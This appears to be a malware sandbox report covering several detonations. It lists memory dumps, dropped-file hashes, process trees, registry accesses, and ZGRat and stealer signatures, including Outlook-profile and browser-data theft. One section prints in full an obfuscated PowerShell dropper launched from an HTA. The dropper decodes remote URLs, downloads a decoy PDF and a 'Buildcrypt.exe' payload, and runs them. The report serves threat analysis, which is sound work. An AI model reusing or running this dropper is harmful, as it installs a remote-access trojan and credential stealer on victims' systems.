memory/352-2-0x0000000004BD0000-0x0000000004BE0000-memory.dmp

memory/352-3-0x0000000005660000-0x0000000005796000-memory.dmp

memory/352-11-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-19-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-25-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-33-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-39-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-49-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-57-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-65-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-67-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-63-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-61-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-59-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-55-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-53-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-51-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-47-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-45-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-43-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-41-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-37-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-35-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-31-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-29-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-27-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-23-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-21-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-17-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-15-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-13-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-9-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-7-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-5-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-4-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-938-0x0000000005A70000-0x0000000005ABC000-memory.dmp

memory/352-937-0x00000000059A0000-0x0000000005A6E000-memory.dmp

memory/352-936-0x00000000057A0000-0x00000000057A1000-memory.dmp

memory/352-939-0x0000000006250000-0x00000000067F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RagCrypt.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

memory/2524-945-0x0000000000400000-0x0000000000578000-memory.dmp

memory/2524-944-0x00000000751F0000-0x00000000759A0000-memory.dmp

memory/2524-948-0x0000000005620000-0x0000000005630000-memory.dmp

memory/2524-947-0x0000000005460000-0x00000000054C6000-memory.dmp

memory/2524-946-0x00000000053C0000-0x0000000005452000-memory.dmp

memory/352-943-0x00000000751F0000-0x00000000759A0000-memory.dmp

memory/2524-949-0x0000000006300000-0x000000000630A000-memory.dmp

memory/2524-950-0x00000000087C0000-0x0000000008810000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt

MD5 ae0f7fab163139c661e576fe0af08651
SHA1 7545ab94360fd93f2209021b4cecabb92592be27
SHA256 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657
SHA512 a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b

C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt

MD5 0f5f7a38759e578c92bcf62c45d80b8a
SHA1 211e70ede55cce5bf67f685d85cbd030a8517d2b
SHA256 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc
SHA512 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d

memory/2524-990-0x00000000751F0000-0x00000000759A0000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

135s

Max time network

150s

Command Line

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Utsxokye.wav"

Signatures

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\unregmp2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\unregmp2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\unregmp2.exe N/A

Processes

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Utsxokye.wav"

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Utsxokye.wav"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

Network

Country Destination Domain Proto
US 8.8.8.8:53 wmploc.dll udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 18.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 23.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 31.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\wmsetup.log

MD5 13ab2123a617187ba186a53cef7a5f77
SHA1 d649d1cbb01018d02fa965adef7b97408d86fe9d
SHA256 e8aa79d9d7ac6947fd7c2fc35b501dbc212ad1c1439d58bd58deae02ff81cf92
SHA512 e02c68c61711a572e90727129d9ff5f7494218e625f0600e135c44b57a7c29ef2cf2e686fdfb0afe04b4b248f853c88c35cd70761c8585c434d4a62a339fd7ad

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 c374c25875887db7d072033f817b6ce1
SHA1 3a6d10268f30e42f973dadf044dba7497e05cdaf
SHA256 05d47b87b577841cc40db176ea634ec49b0b97066e192e1d48d84bb977e696b6
SHA512 6a14f81a300695c09cb335c13155144e562c86bb0ddfdcab641eb3a168877ad3fcc0579ad86162622998928378ea2ffe5a244b3ddbe6c11a959dbb34af374a7d

Analysis: behavioral4

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

148s

Max time network

151s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Docs.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
(34 matches, each recorded as N/A in every column: the rule fired, but the report carries no indicator, process or target for any of them)

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1000 set thread context of 4664 N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2776 wrote to memory of 952 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 952 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 952 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 2116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 952 wrote to memory of 2116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 952 wrote to memory of 2116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 952 wrote to memory of 1000 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
PID 952 wrote to memory of 1000 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
PID 952 wrote to memory of 1000 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
PID 2116 wrote to memory of 3428 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3428 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3428 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (43 identical events)
PID 3428 wrote to memory of 3036 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Windows\SysWOW64\netsh.exe (9 identical events)

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Docs.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dxkEOJ($jqyPVSgWqmmMsu, $aNoKIHhsKCDNWp){[IO.File]::WriteAllBytes($jqyPVSgWqmmMsu, $aNoKIHhsKCDNWp)};function jjdeCQWVxw($jqyPVSgWqmmMsu){if($jqyPVSgWqmmMsu.EndsWith((sqawNbuSbNoQJZv @(58322,58376,58384,58384))) -eq $True){rundll32.exe $jqyPVSgWqmmMsu }elseif($jqyPVSgWqmmMsu.EndsWith((sqawNbuSbNoQJZv @(58322,58388,58391,58325))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $jqyPVSgWqmmMsu}elseif($jqyPVSgWqmmMsu.EndsWith((sqawNbuSbNoQJZv @(58322,58385,58391,58381))) -eq $True){misexec /qn /i $jqyPVSgWqmmMsu}else{Start-Process $jqyPVSgWqmmMsu}};function HbrgwLHwrnHIIKcXF($PsSShlejHlmIATZ){$DiupfoBkkti = New-Object (sqawNbuSbNoQJZv @(58354,58377,58392,58322,58363,58377,58374,58343,58384,58381,58377,58386,58392));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$aNoKIHhsKCDNWp = $DiupfoBkkti.DownloadData($PsSShlejHlmIATZ);return $aNoKIHhsKCDNWp};function sqawNbuSbNoQJZv($IGSmIy){$qiARGdapNw=58276;$oaVnqUhEZ=$Null;foreach($PnrRNHiYycYQVcn in $IGSmIy){$oaVnqUhEZ+=[char]($PnrRNHiYycYQVcn-$qiARGdapNw)};return $oaVnqUhEZ};function SSSHxFUz(){$SrNKPGroYNNtLyR = $env:AppData + '\';$mVYpdLNFBXXciTDAvNH = $SrNKPGroYNNtLyR + 'Document.pdf';If(Test-Path -Path $mVYpdLNFBXXciTDAvNH){Invoke-Item $mVYpdLNFBXXciTDAvNH;}Else{ $lyGsxYZsmNE = HbrgwLHwrnHIIKcXF (sqawNbuSbNoQJZv @(58380,58392,58392,58388,58391,58334,58323,58323,58385,58373,58379,58381,58375,58322,58388,58387,58381,58391,58387,58386,58392,58387,58387,58384,58398,58322,58375,58387,58385,58323,58344,58387,58375,58393,58385,58377,58386,58392,58322,58388,58376,58378));dxkEOJ $mVYpdLNFBXXciTDAvNH $lyGsxYZsmNE;Invoke-Item $mVYpdLNFBXXciTDAvNH;};$bblLmj = $SrNKPGroYNNtLyR + 'Buildcrypt.exe'; if (Test-Path -Path $bblLmj){jjdeCQWVxw $bblLmj;}Else{ $SlNerqupbdAkKp = HbrgwLHwrnHIIKcXF (sqawNbuSbNoQJZv 
@(58380,58392,58392,58388,58391,58334,58323,58323,58385,58373,58379,58381,58375,58322,58388,58387,58381,58391,58387,58386,58392,58387,58387,58384,58398,58322,58375,58387,58385,58323,58342,58393,58381,58384,58376,58375,58390,58397,58388,58392,58322,58377,58396,58377));dxkEOJ $bblLmj $SlNerqupbdAkKp;jjdeCQWVxw $bblLmj;};;;;}SSSHxFUz;

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Document.pdf"

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

"C:\Users\Admin\AppData\Roaming\Buildcrypt.exe"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=B1BA23CBB6B8ADE984E66F02BD8FFBCB --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=B1BA23CBB6B8ADE984E66F02BD8FFBCB --renderer-client-id=2 
--mojo-platform-channel-handle=1704 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

